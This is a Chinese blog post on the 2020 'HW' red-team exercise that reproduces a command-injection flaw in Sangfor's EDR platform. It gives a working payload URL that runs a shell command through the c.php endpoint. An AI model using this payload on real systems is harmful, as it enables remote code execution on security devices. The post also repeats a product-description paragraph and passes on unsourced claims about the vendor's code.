SXF终端检测平台 EDR漏洞复现

昨天是2020年8月17日,对于做安全的人来说,特别是渗透红蓝对抗这种的,肯定印象极其深刻:

其中不乏有巨佬坐镇的,也有混子摸鱼混经验的,各种操作姿势也是层出不穷:

HW期间听闻的各种神操作:
无人机搞Wi-Fi的
挖下水道进内部的
BadUSB钓鱼的
提前半个月混入甲方的
望远镜看密码的
红队伪装蓝队进行木马钓鱼的
利用深信服0day伪装进入的
首页开局一张图片的
美人计的

只有你想不到的,该做的都做了。害。

昨天最令人震惊的就是深信服的EDR设备,作为终端检测响应平台,竟然存在漏洞,还如此之多。

什么是EDR:围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。SXF终端检测平台 EDR漏洞复现_第1张图片

漏洞复现:

payload:

https://xxx.xxx/tool/log/c.php?strip_slashes=system&host=pwd

SXF终端检测平台 EDR漏洞复现_第2张图片

可以说是比较失败的一个产品,作为一个盾,怎么能忍受盾的本身有边边角角的裂口?

源码没有看过,但是也听说了:写的很烂,可以说他们的开发完全没有任何安全开发的经验或者培训,代码的bug数量都快超过代码本身。。。。

这只是冰山一脚。可能在后面的hw行动中还会有爆出的东西。

以上内容仅供学习参考,切勿使用非法用途!

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

你可能感兴趣的:(安全,攻防,安全漏洞,红蓝对抗,安全产品漏洞)